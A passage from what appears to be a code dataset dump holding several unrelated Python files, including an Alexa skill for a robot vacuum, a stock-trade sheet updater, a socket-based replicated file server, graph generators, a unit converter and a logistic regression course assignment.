----------------------\n\ndef build_speechlet_response(card, speech_output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': speech_output\n },\n 'card': card,\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\ndef build_clean_card():\n now = datetime.now(timezone(os.environ['timezone']))\n card_output = \"Cleaning session started on \"\n date = now.strftime(\"%B %d\")\n if now.day<10:\n date = date.replace(\"0\",\"\")\n if now.day % 10 == 1:\n date += \"st \"\n elif now.day % 10 == 2:\n date += \"nd \"\n elif now.day % 10 == 3:\n date += \"rd \"\n else:\n date += \"th \"\n time = (now.strftime(\"at %I:%M%p.\")).lower()\n if time[3] == \"0\":\n time = time[:3]+time[4:]\n return {\n 'type': 'Simple',\n 'title': \"Ecovacs\",\n 'content': card_output + date + time\n }\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_clean_response():\n speech_output = \"Your vaccum is starting its cleaning session.\"\n if 'timezone' in os.environ:\n card = build_clean_card()\n else:\n card = None\n should_end_session = True\n return build_response(None, build_speechlet_response(\n card, speech_output, None, should_end_session))\n\ndef get_charge_response():\n speech_output = \"Your vaccum is going back to its station.\"\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_stop_response():\n speech_output = \"Your vacuum is stopping.\"\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_service_response():\n speech_output = \"Your vacuum is ready for some servicing.\"\n should_end_session = True\n return build_response(None , build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_battery_response(battery):\n speech_output = \"Your vacuum's battery is currently at %s%%.\" % int(battery*100)\n should_end_session = True\n return build_response(None, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\ndef get_welcome_response():\n session_attributes = {}\n speech_output = \"Welcome to the Ecovacs skill. What can I help you with? \"\n reprompt_text = \"You can ask for your vacuum to start cleaning, come out for service\" \\\n \"or go back to its charging station.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n None, speech_output, reprompt_text, should_end_session))\n\ndef handle_session_end_request():\n speech_output = \"Thank you for trying the Ecovacs skill. \" \\\n \"Have a nice day! 
\"\n should_end_session = True\n return build_response({}, build_speechlet_response(\n None, speech_output, None, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\ndef on_launch(launch_request, session):\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return get_welcome_response()\n\ndef on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n if intent_name == \"CleanIntent\":\n perform_action(Clean())\n return get_clean_response()\n elif intent_name == \"EdgeIntent\":\n perform_action(Edge())\n return get_clean_response()\n elif intent_name == \"SpotIntent\":\n perform_action(Spot())\n return get_clean_response()\n elif intent_name == \"StopIntent\":\n perform_action(Stop())\n return get_stop_response()\n elif intent_name == \"ChargeIntent\":\n perform_action(Charge())\n return get_charge_response()\n elif intent_name == \"ServiceIntent\":\n perform_service()\n return get_service_response()\n elif intent_name == \"BatteryIntent\":\n battery = perform_action(GetBatteryState())\n return get_battery_response(battery.battery_status)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\ndef on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n if 'applicationId' in os.environ:\n if (event['session']['application']['applicationId'] !=\n os.environ['applicationId']):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","sub_path":"Deploy/skill.py","file_name":"skill.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291220186","text":"from connect import *\r\n\r\nsheet = Connect(\"Weekly Buy-Sell\", \"Clean\")\r\nnames = sheet.row_values(2)\r\n\r\n\r\ndef filterData(a, b): # will return a list of dictionary containg rows to be processed\r\n # a, b is the range of rows which need to be processed\r\n # this is an examle of an element of the list\r\n '''{'Call': 'Long',\r\n 'DHigh': '447.3',\r\n 'Dlow': '436.55',\r\n 'Live': '443.15',\r\n 'Price': '446.3',\r\n 'Risk/Reward': '0.27',\r\n 'SL%': '1.68%',\r\n 'Status': '',\r\n 'Stock Name': 'CONCOR',\r\n 'Stop Loss': '438.8',\r\n 'Target': '474.3',\r\n 
'Target%': '6.27%',\r\n 'Timestamp': '26/07/2020',\r\n 'Trade': '',\r\n 'Trade_High': '447.3',\r\n 'Trade_LTP': '443.15',\r\n 'Trade_Low': '436.55'}'''\r\n # for every row there will be one dictionary element present\r\n mix = []\r\n range_data = sheet.get(\"A{}:Q{}\".format(a, b))\r\n for i in range(len(range_data)):\r\n temp = {}\r\n for j in range(17):\r\n temp[names[j]] = range_data[i][j]\r\n mix.append(temp)\r\n return mix\r\n\r\n\r\ndef updatPrice(row): # update daily price\r\n # check if trade is Exited or not\r\n if row[\"Trade\"] != \"Exit\":\r\n try:\r\n # update Trade_LTP\r\n row[\"Trade_LTP\"] = float(row[\"Live\"])\r\n # update Trade_Low price\r\n if float(row[\"Trade_Low\"]) > float(row[\"DLow\"]):\r\n row[\"Trade_Low\"] = row[\"DLow\"]\r\n # update Trade_high price\r\n if float(row[\"Trade_High\"]) < float(row[\"DHigh\"]):\r\n row[\"Trade_High\"] = row[\"DHigh\"]\r\n except Exception:\r\n pass\r\n\r\n\r\ndef tradeConfirmation(row): # check wethere a trade has been taken or not\r\n if row[\"Call\"] == \"Long\":\r\n try:\r\n if float(row[\"Trade_Low\"]) <= float(row[\"Price\"]):\r\n row[\"Trade\"] = 'In'\r\n return True\r\n else:\r\n row['Trade'] = 'Out'\r\n return False\r\n except Exception:\r\n print(\">>Something wrong with \", row[\"Stock Name\"])\r\n\r\n else:\r\n # short position\r\n if row[\"Call\"] == \"Short\":\r\n try:\r\n if float(row[\"Trade_Low\"]) >= float(row[\"Price\"]):\r\n row[\"Trade\"] = 'In'\r\n return True\r\n else:\r\n row['Trade'] = 'Out'\r\n return False\r\n except Exception:\r\n print(\">>Something wrong with \", row[\"Stock Name\"])\r\n\r\n\r\ndef checkStop(row): # check if the stock has hit stop loss or not\r\n if row[\"Trade\"] == \"In\":\r\n if float(row[\"Trade_LTP\"]) <= float(row[\"Stop Loss\"]):\r\n row[\"Status\"] = 'Stoped'\r\n row[\"Trade\"] = \"Exit\" # will marke the trade as complete\r\n else:\r\n row[\"Status\"] = 'Between'\r\n\r\n\r\ndef checkTatget(row): # check if the stock has hit target price or not\r\n if row[\"Trade\"] == \"In\":\r\n if float(row[\"Trade_LTP\"]) >= float(row[\"Target\"]):\r\n row[\"Status\"] = 'Target'\r\n row[\"Trade\"] = \"Exit\" # will marke the trade as complete\r\n else:\r\n row[\"Status\"] = 'Between'\r\n\r\n\r\ndef update2Sheet(): # write the updated data to google sheet\r\n updatedData = []\r\n for i in rows:\r\n updatedData.append([i[\"Trade\"], i[\"Status\"], float(i[\"Trade_LTP\"]),\r\n float(i[\"Trade_Low\"]), float(i[\"Trade_High\"])])\r\n sheet.update('M{}:Q{}'.format(a, b), updatedData)\r\n\r\n\r\ndef start(): # it will ask row number to be updated and will process all the data\r\n global rows, a, b\r\n a, b = map(int, input(\"Enter Row Numbers: \").split())\r\n print(\"Importing Data\")\r\n rows = filterData(a, b)\r\n print(\"Processing Data\")\r\n for i in rows:\r\n updatPrice(i)\r\n tradeConfirmation(i)\r\n checkTatget(i)\r\n checkStop(i)\r\n update2Sheet()\r\n print(\"Done\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"296799811","text":"\n\nfrom xai.brain.wordbase.adjectives._bandy import _BANDY\n\n#calss header\nclass _BANDIER(_BANDY, ):\n\tdef __init__(self,): \n\t\t_BANDY.__init__(self)\n\t\tself.name = \"BANDIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"bandy\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/adjectives/_bandier.py","file_name":"_bandier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"72734641","text":"#!/usr/bin/env python3\n\nimport socket, sys, os, signal\nimport szasar\nimport select\n\nPORT2 = 6014\nFILES_PATH = \"files2\"\nMAX_FILE_SIZE = 10 * 1 << 20 # 10 MiB\nSPACE_MARGIN = 50 * 1 << 20 # 50 MiB\nUSERS = (\"anonymous\", \"sar\", \"sza\")\nPASSWORDS = (\"\", \"sar\", \"sza\")\nSERVER = 'localhost'\nPORT_R = 6015\nPORT_ALT = 6017\nuser = \"\"\nfilename = \"\"\nfilesize = 0\n\n\ndef comprobar(s_alt):\n    while (1):\n        preparados, _, _ = select.select([s_alt], [], [], 10)\n        if (len(preparados) == 0):\n            print (\"THE PRIMARY SERVER HAS FAILED\")\n        else:\n            szasar.recvline(s_alt).decode(\"ascii\")\n            s_alt.sendall(\"OK\\r\\n\".encode(\"ascii\"))\n\n\ndef empty_socket(sock):\n\tinput = sock\n\twhile 1:\n\t\tinputready, o, e = select.select(input, [], [], 0.0)\n\t\tif len(inputready) == 0: break\n\t\tfor s in inputready: s.recv(1)\n\t\tbreak\n\n\nclass State:\n    Identification, Authentication, Main, Downloading, Uploading = range(5)\n\nstate = State.Identification\n\ndef sendOK(s, params=\"\"):\n    s.sendall((\"OK{}\\r\\n\".format(params)).encode(\"ascii\"))\n\n\ndef sendER(s, code=1):\n    s.sendall((\"ER{}\\r\\n\".format(code)).encode(\"ascii\"))\n\ndef tratarMensaje(message,s):\n    print (\"handled: \"+ message)\n    global FILES_PATH\n    global user\n    global filename\n    global filesize\n    global state\n\n    if message.startswith(szasar.Command.User):\n        if (state != State.Identification):\n            sendER(s)\n        try:\n            user = USERS.index(message[4:])\n        except:\n            sendER(s, 2)\n        else:\n            sendOK(s)\n            state = State.Authentication\n\n    elif message.startswith(szasar.Command.Password):\n        if state != State.Authentication:\n            sendER(s)\n        if ( user == 0 or PASSWORDS[user] == message[4:]):\n            FILES_PATH = FILES_PATH + \"/\" + USERS[user]\n\n            sendOK(s)\n            state = State.Main\n\n        else:\n            sendER(s, 3)\n            state = State.Identification\n\n    elif message.startswith(szasar.Command.List):\n        if state != State.Main:\n            sendER(s)\n        try:\n            message = \"OK\\r\\n\"\n            for filename in os.listdir(FILES_PATH):\n                filesize = os.path.getsize(os.path.join(FILES_PATH, filename))\n                message += \"{}?{}\\r\\n\".format(filename, filesize)\n            message += \"\\r\\n\"\n        except:\n            sendER(s, 4)\n        else:\n            s.sendall(message.encode(\"ascii\"))\n\n    elif message.startswith(szasar.Command.Download):\n        if state != State.Main:\n            sendER(s)\n        filename = os.path.join(FILES_PATH, message[4:])\n        try:\n            filesize = os.path.getsize(filename)\n        except:\n            sendER(s, 5)\n        else:\n            sendOK(s, filesize)\n            state = State.Downloading\n\n    elif message.startswith(szasar.Command.Download2):\n        if state != State.Downloading:\n            sendER(s)\n        state = State.Main\n        try:\n            with open(filename, \"rb\") as f:\n                filedata = f.read()\n        except:\n            sendER(s, 6)\n        else:\n            sendOK(s)\n            s.sendall(filedata)\n\n    elif message.startswith(szasar.Command.Upload):\n        if state != State.Main:\n            sendER(s)\n        if user == 0:\n            sendER(s, 7)\n        filename, filesize = message[4:].split('?')\n        filesize = int(filesize)\n        if filesize > MAX_FILE_SIZE:\n            sendER(s, 8)\n        svfs = os.statvfs(FILES_PATH)\n        if filesize + SPACE_MARGIN > svfs.f_bsize * svfs.f_bavail:\n            sendER(s, 9)\n        sendOK(s)\n        state = State.Uploading\n\n    elif message.startswith(szasar.Command.Upload2):\n        if state != State.Uploading:\n            sendER(s)\n        state = State.Main\n        try:\n            with open(os.path.join(FILES_PATH, filename), \"wb\") as f:\n                filedata = 
szasar.recvall(s, filesize)\n                f.write(filedata)\n        except:\n            sendER(s, 10)\n        else:\n            sendOK(s)\n\n    elif message.startswith(szasar.Command.Delete):\n        if state != State.Main:\n            sendER(s)\n\n        if user == 0:\n            sendER(s, 7)\n\n        try:\n            os.remove(os.path.join(FILES_PATH, message[4:]))\n        except:\n            sendER(s, 11)\n        else:\n            sendOK(s)\n\n    elif message.startswith(szasar.Command.Exit):\n        sendOK(s)\n        return\n\n    else:\n        sendER(s)\n\n\n\ndef difundir(message, sr):\n    message_r = message + \"\\r\\n\"\n    sr.sendall(message_r.encode(\"ascii\"))\n\ndef session(s, sr):\n    ULTIMO = 0\n    inputs = [s, sr]\n    while True:\n        disponibles = 0\n        while disponibles == 0:\n            inready, outready, excready = select.select(inputs, [], [])\n            disponibles = len(inready)\n            print (\"SOCKETS WITH A MESSAGE \" + str(disponibles))\n\n\n        if (disponibles == 1):\n            if (s in inready):\n                print (\"MESSAGE FROM S\")\n                message = szasar.recvline(s).decode(\"ascii\")\n                print (message)\n                if (int(message[:4]) > int(ULTIMO)):\n                    ULTIMO = message[:4]\n                    difundir(message, sr)\n                    tratarMensaje(message[4:], s)\n            elif (sr in inready):\n                print(\"MESSAGE FROM SR\")\n                message = szasar.recvline(sr).decode(\"ascii\")\n                print(message)\n                if (int(message[:4]) > int(ULTIMO)):\n                    ULTIMO = message[:4]\n                    tratarMensaje(message[4:], s)\n\n        elif (disponibles == 2):\n            print (\"BOTH SOCKETS ARE READY\")\n            message_s = szasar.recvline(s).decode()\n            message_r = szasar.recvline(sr).decode()\n            ID_s = message_s[:4]\n            ID_r = message_r[:4]\n            if (int(ID_s) > int(ULTIMO)):\n                ULTIMO = message_s[:4]\n                difundir(message_s, sr)\n                tratarMensaje(message_s[4:], s)\n            if (int(ID_r) > int(ULTIMO)):\n                ULTIMO = message_r[:4]\n                tratarMensaje(message_r[4:], s)\n\n\nif __name__ == \"__main__\":\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((SERVER, PORT2))\n\n    sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sr.connect((SERVER, PORT_R))\n\n\n    session(s, sr)\n\n","sub_path":"serv_fich_r2.py","file_name":"serv_fich_r2.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"491930452","text":"import random as rnd\n \ndef grafoCompleto(n,salida):\n    # generate 5 complete graphs of the same size with random weights\n    canttesteos = 5\n    fOut = open(salida, 'w')\n    fOut.write(str(canttesteos) + '\\n')\n    for t in range(1,canttesteos + 1):\n        fOut.write(str(n)+ \" \" + str(n*(n-1)) + '\\n')\n        for i in range(1,n + 1):\n            for j in range(1,n+1):\n                if j != i:\n                    linea = str(i)+ \" \" + str(j) \n                    fOut.write(linea + '\\n')\n        fOut.write(\"-1 -1\"+'\\n')\n\ndef grafoCicloSimple(n,salida):\n    # generate 5 graphs that are a single simple cycle\n    canttesteos = 5\n    fOut = open(salida, 'w')\n    fOut.write(str(canttesteos) + '\\n')\n    for t in range(1,canttesteos + 1):\n        fOut.write(str(n)+ \" \" + str(n) + '\\n')\n        for i in range(1,n + 1):\n            j = i+1\n            if j > n:\n                j = 1\n            linea = str(i)+ \" \" + str(j) \n            fOut.write(linea + '\\n')\n        fOut.write(\"-1 -1\"+'\\n')\n\ndef grafoRnd(n,salida):\n    # 5 random graphs with at least one cycle\n    fOut = open(salida, 'w')\n    m = rnd.randint(n, n*(n-1))\n    fOut.write(str(n)+ \" \" + str(m) + '\\n')\n    k=0\n    #build an adjacency matrix to avoid repeating edges\n    #matriz = [[ 0 for x in range(n)] for y in range(n)]\n    matriz = []\n    for i in range(n):\n        matriz.append([])\n        for j in range(n):\n            matriz[i].append(None)\n            matriz[i][j] = 0\n    #build a cycle\n    for i in range(1,n + 1):\n        j = i+1\n        if j > n:\n            j = 1\n        linea = str(i)+ \" \" + str(j)\n        matriz[i-1][j-1]=1\n        k = k +1 \n        
fOut.write(linea + '\\n')\n #armo aristas aleatorias viendo que no se repitan\n while k < m:\n for i in range(1,n + 1):\n base = rnd.randint(1,n)\n cant = rnd.randint(1,n)\n tope = rnd.randint(base, min(n, base+cant)) \n for j in range(base, tope):\n if k >= m:\n j = tope\n i = n+1\n else:\n nodoDestino = rnd.randint(base, tope)\n if matriz[i-1][nodoDestino-1] != 1 and i != nodoDestino:\n matriz[i-1][nodoDestino-1]=1\n linea = str(i)+ \" \" + str(nodoDestino) \n fOut.write(linea + '\\n')\n k = k+1\n\ndef grafoMaloMalosoGRASP(tamClique,salida):\n gradoAlto = (tamClique * 2) -1\n n = tamClique + tamClique * (tamClique-1) + tamClique * ((2*tamClique)-2)\n m = tamClique*(tamClique-1) + tamClique * (tamClique-1) + tamClique * ((2*tamClique)-2)\n fOut = open(salida, 'w')\n fOut.write(str(n)+ \" \" + str(m) + '\\n')\n for i in range(1,tamClique + 1):\n for j in range(1,tamClique+1):\n if j != i:\n linea = str(i)+ \" \" + str(j) \n fOut.write(linea + '\\n')\n nodo = tamClique+1\n altosNodos = []\n for i in range(1,tamClique + 1):\n altosNodos.append(nodo)\n for j in range(0,tamClique-1):\n linea = str(i)+ \" \" + str(nodo) \n fOut.write(linea + '\\n')\n nodo += 1\n for nAlto in altosNodos:\n for i in range(gradoAlto-1):\n linea = str(nAlto)+ \" \" + str(nodo) \n fOut.write(linea + '\\n')\n nodo+=1 \n#blabla\nfor i in range(10,201):\n out = \"./GrafoMM\" + str(i)\n grafoMaloMalosoGRASP(i,out)","sub_path":"Algoritmos y Estructuras de Datos 3/tp3/CrearGrafos.py","file_name":"CrearGrafos.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294653558","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom decimal import Decimal as D\n\nfrom unit_converter.exceptions import UnConsistentUnitsError\n\n\nclass UnitPrefix(object):\n\n def __init__(self, symbol, name, factor):\n self.symbol = symbol\n self.name = name\n\n if isinstance(factor, str):\n self.factor = D(factor)\n elif isinstance(factor, D):\n self.factor = factor\n else:\n raise TypeError(\"factor need to be a 'string' or a\"\n \" 'decimal.Decimal' class\")\n\n def __repr__(self):\n return (\"UnitPrefix(symbol='%s', name='%s', factor='%s')\" %\n (self.symbol, self.name, self.factor))\n\n def is_same_factor(self, other_prefix):\n return self.factor == other_prefix.factor\n\n def __eq__(self, other_prefix):\n return (self.symbol == other_prefix.symbol and\n self.name == other_prefix.name and\n self.factor == other_prefix.factor)\n\n def __mul__(self, unit):\n if isinstance(unit, Unit):\n final_unit = Unit(symbol=self.symbol + unit.symbol,\n name=self.name + unit.name,\n L=unit.L,\n M=unit.M,\n T=unit.T,\n I=unit.I,\n THETA=unit.THETA,\n N=unit.N,\n J=unit.J,\n coef=self.factor * unit.coef,\n offset=unit.offset)\n return final_unit\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(unit)))\n\n\nclass Unit(object):\n\n def __init__(self, symbol, name, plural_name=None,\n L=0, M=0, T=0, I=0, THETA=0, N=0, J=0,\n coef=D('1'), offset=D('0')):\n self.symbol = symbol\n self.name = name\n self.plural_name = plural_name or name\n self.coef = coef\n self.offset = offset\n\n # Dimensional quantities\n # -----------------------\n self.L = L # Length\n self.M = M # Mass\n self.T = T # Time\n self.I = I # Electric current\n self.THETA = THETA # Thermodynamic temperature\n self.N = N # Amount of substance\n self.J = J # Light intensity\n\n def __repr__(self):\n # TODO: Add a better representation including coef and 
offset.\n # TODO: Hide plotting 0 dimension\n l_units_r = (\"m^%s\", \"kg^%s\", \"s^%s\", \"A^%s\", \"K^%s\", \"mol^%s\", \"cd^%s\")\n units = (self.L, self.M, self.T, self.I, self.THETA, self.N, self.J)\n\n unit_r = [r % units[idx] for idx, r in enumerate(l_units_r) if units[idx]]\n return '*'.join(unit_r)\n\n def is_same_dimension(self, other_unit):\n return (self.L == other_unit.L and\n self.M == other_unit.M and\n self.T == other_unit.T and\n self.I == other_unit.I and\n self.THETA == other_unit.THETA and\n self.N == other_unit.N and\n self.J == other_unit.J)\n\n def __eq__(self, other):\n return (self.is_same_dimension(other) and\n self.coef == other.coef and\n self.offset == other.offset)\n\n def __mul__(self, other):\n if isinstance(other, Unit):\n return self.__class__(symbol=self.symbol + '*' + other.symbol,\n name=self.name + '*' + other.name,\n L=self.L + other.L,\n M=self.M + other.M,\n T=self.T + other.T,\n I=self.I + other.I,\n THETA=self.THETA + other.THETA,\n N=self.N + other.N,\n J=self.J + other.J,\n coef=self.coef * other.coef,\n offset=self.offset + other.offset)\n elif type(other) in (int, float, D):\n return Quantity(value=other, unit=self)\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(other)))\n\n def __pow__(self, power):\n if type(power) in (int, float, D):\n if self.offset:\n new_offset = self.offset**D(power)\n else:\n new_offset = self.offset\n final_unit = self.__class__(symbol=self.symbol + '^' + str(power), # TODO: careful, parentheses are missing etc.\n name=self.name + '^' + str(power),\n L=self.L * power,\n M=self.M * power,\n T=self.T * power,\n I=self.I * power,\n THETA=self.THETA * power,\n N=self.N * power,\n J=self.J * power,\n coef=self.coef**D(power),\n offset=new_offset)\n return final_unit\n else:\n raise TypeError(\"unsupported operand type(s) for : '%s' and '%s'\" %\n (type(self), type(power)))\n\n def __truediv__(self, other):\n return self.__mul__(other**-1)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __rtruediv__(self, other):\n return self.__pow__(-1).__mul__(other)\n\n\nclass Quantity(object):\n\n def __init__(self, value, unit):\n if type(value) in (int, float, D):\n self.value = value\n else:\n raise TypeError(\"value must be an int, float or decimal class\")\n\n if isinstance(unit, Unit):\n self.unit = unit\n else:\n raise TypeError(\"unit must be a Unit class\")\n\n def convert(self, desired_unit: Unit):\n # Check dimension from current and desired units\n if not desired_unit.is_same_dimension(self.unit):\n raise UnConsistentUnitsError(desired_unit.name, self.unit.name)\n\n default_value = self.unit.offset + self.value * self.unit.coef\n desired_value = (-desired_unit.offset + default_value) / desired_unit.coef\n return self.__class__(value=desired_value, unit=desired_unit)\n\n def __repr__(self):\n return str(self.value) + ' ' + str(self.unit)\n\n def __add__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value + other.value, self.unit)\n\n def __sub__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value - other.value, self.unit)\n\n def __mul__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value * other.value,\n self.unit * other.unit)\n\n def __truediv__(self, other):\n if isinstance(other, Quantity):\n if self.unit == other.unit:\n return self.__class__(self.value / other.value,\n self.unit / 
other.unit)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __rsub__(self, other):\n return self.__sub__(other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __rtruediv__(self, other):\n return self.__truediv__(other)\n","sub_path":"venvwindows/Lib/site-packages/unit_converter/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"196025317","text":"from __future__ import print_function\r\nimport math\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nThis file is part of the computer assignments for the course DD1418/DD2418 Language engineering at KTH.\r\nCreated 2017 by Johan Boye, Patrik Jonell and Dmytro Kalpakchi.\r\n\"\"\"\r\n\r\nclass BinaryLogisticRegression(object):\r\n \"\"\"\r\n This class performs binary logistic regression using batch gradient descent\r\n or stochastic gradient descent\r\n \"\"\"\r\n\r\n\r\n def __init__(self, x=None, y=None, theta=None):\r\n \"\"\"\r\n Constructor. Imports the data and labels needed to build theta.\r\n\r\n @param x The input as a DATAPOINT*FEATURES array.\r\n @param y The labels as a DATAPOINT array.\r\n @param theta A ready-made model. (instead of x and y)\r\n \"\"\"\r\n\r\n # ------------- Hyperparameters ------------------ #\r\n\r\n self.LEARNING_RATE = 0.01 # The learning rate.\r\n self.CONVERGENCE_MARGIN = 0.001 # The convergence criterion.\r\n self.MAX_ITERATIONS = 1 # Maximal number of passes through the datapoints in stochastic gradient descent.\r\n self.MINIBATCH_SIZE = 1000 # Minibatch size (only for minibatch gradient descent)\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n if not any([x, y, theta]) or all([x, y, theta]):\r\n raise Exception('You have to either give x and y or theta')\r\n\r\n if theta:\r\n self.FEATURES = len(theta)\r\n self.theta = theta\r\n\r\n elif x and y:\r\n # Number of datapoints.\r\n self.DATAPOINTS = len(x)\r\n\r\n # Number of features.\r\n self.FEATURES = len(x[0]) + 1\r\n\r\n # Encoding of the data points (as a DATAPOINTS x FEATURES size array).\r\n self.x = np.concatenate((np.ones((self.DATAPOINTS, 1)), np.array(x)), axis=1)\r\n\r\n # Correct labels for the datapoints.\r\n self.y = np.array(y)\r\n\r\n # The weights we want to learn in the training phase.\r\n self.theta = np.random.uniform(-1, 1, self.FEATURES)\r\n\r\n # The current gradient.\r\n self.gradient = np.zeros(self.FEATURES)\r\n\r\n self.training_iteration = 0\r\n\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n\r\n def sigmoid(self, z):\r\n \"\"\"\r\n The logistic function.\r\n \"\"\"\r\n return 1.0 / ( 1 + math.exp(-z) )\r\n\r\n\r\n def conditional_prob(self, label, datapoint):\r\n \"\"\"\r\n Computes the conditional probability P(label|datapoint)\r\n \"\"\"\r\n\r\n # REPLACE THE COMMAND BELOW WITH YOUR CODE\r\n feat_vec = self.x[datapoint]\r\n\r\n if label == 1:\r\n return self.conditional_prob_1(feat_vec)\r\n\r\n return 1 - self.conditional_prob_1(feat_vec)\r\n\r\n def conditional_prob_1(self, feat_vec):\r\n\r\n return self.sigmoid(np.dot(self.theta, feat_vec))\r\n\r\n\r\n def compute_gradient_for_all(self):\r\n \"\"\"\r\n Computes the gradient based on the entire dataset\r\n (used for batch gradient descent).\r\n \"\"\"\r\n\r\n # YOUR CODE HERE\r\n self.compute_gradient_for_subset(0, self.DATAPOINTS)\r\n\r\n def compute_gradient_for_subset(self, 
start_point, end_point):\r\n for feature in range(self.FEATURES):\r\n new_gradient = 0\r\n for datapoint in range(start_point, end_point):\r\n new_gradient += self.compute_feat_gradient(datapoint, feature) / (end_point-start_point)\r\n\r\n self.gradient[feature] = new_gradient\r\n\r\n def compute_feat_gradient(self, datapoint, feature):\r\n return self.x[datapoint][feature] * (\r\n self.conditional_prob_1(self.x[datapoint]) - self.y[datapoint])\r\n\r\n\r\n def compute_gradient_minibatch(self, minibatch):\r\n \"\"\"\r\n Computes the gradient based on a minibatch\r\n (used for minibatch gradient descent).\r\n \"\"\"\r\n \r\n # YOUR CODE HERE\r\n start_point = (minibatch-1) * self.MINIBATCH_SIZE\r\n end_point = minibatch * self.MINIBATCH_SIZE\r\n\r\n self.compute_gradient_for_subset(start_point, end_point)\r\n\r\n\r\n def compute_gradient(self, datapoint):\r\n \"\"\"\r\n Computes the gradient based on a single datapoint\r\n (used for stochastic gradient descent).\r\n \"\"\"\r\n\r\n # YOUR CODE HERE\r\n for feature in range(self.FEATURES):\r\n self.gradient[feature] = self.compute_feat_gradient(datapoint, feature)\r\n\r\n\r\n def stochastic_fit(self):\r\n \"\"\"\r\n Performs Stochastic Gradient Descent.\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n\r\n while self.training_iteration == 0 or self.training_iteration < self.MAX_ITERATIONS*self.DATAPOINTS:\r\n print('Iteration: ', self.training_iteration)\r\n datapoint = np.random.randint(0, self.DATAPOINTS)\r\n\r\n self.compute_gradient(datapoint)\r\n self.upd_theta()\r\n\r\n # plot every 100th iteration\r\n if not self.training_iteration % 100:\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n self.training_iteration += 1\r\n\r\n\r\n def minibatch_fit(self):\r\n \"\"\"\r\n Performs Mini-batch Gradient Descent.\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n max_batch_nr = self.DATAPOINTS // self.MINIBATCH_SIZE\r\n batch_nr = 1\r\n\r\n while not self.converged() or self.training_iteration == 0:\r\n print('Processing batch nr: ', batch_nr)\r\n self.compute_gradient_minibatch(batch_nr)\r\n self.upd_theta()\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n batch_nr += 1\r\n # start over on first batch if processed all data\r\n batch_nr = batch_nr % max_batch_nr\r\n 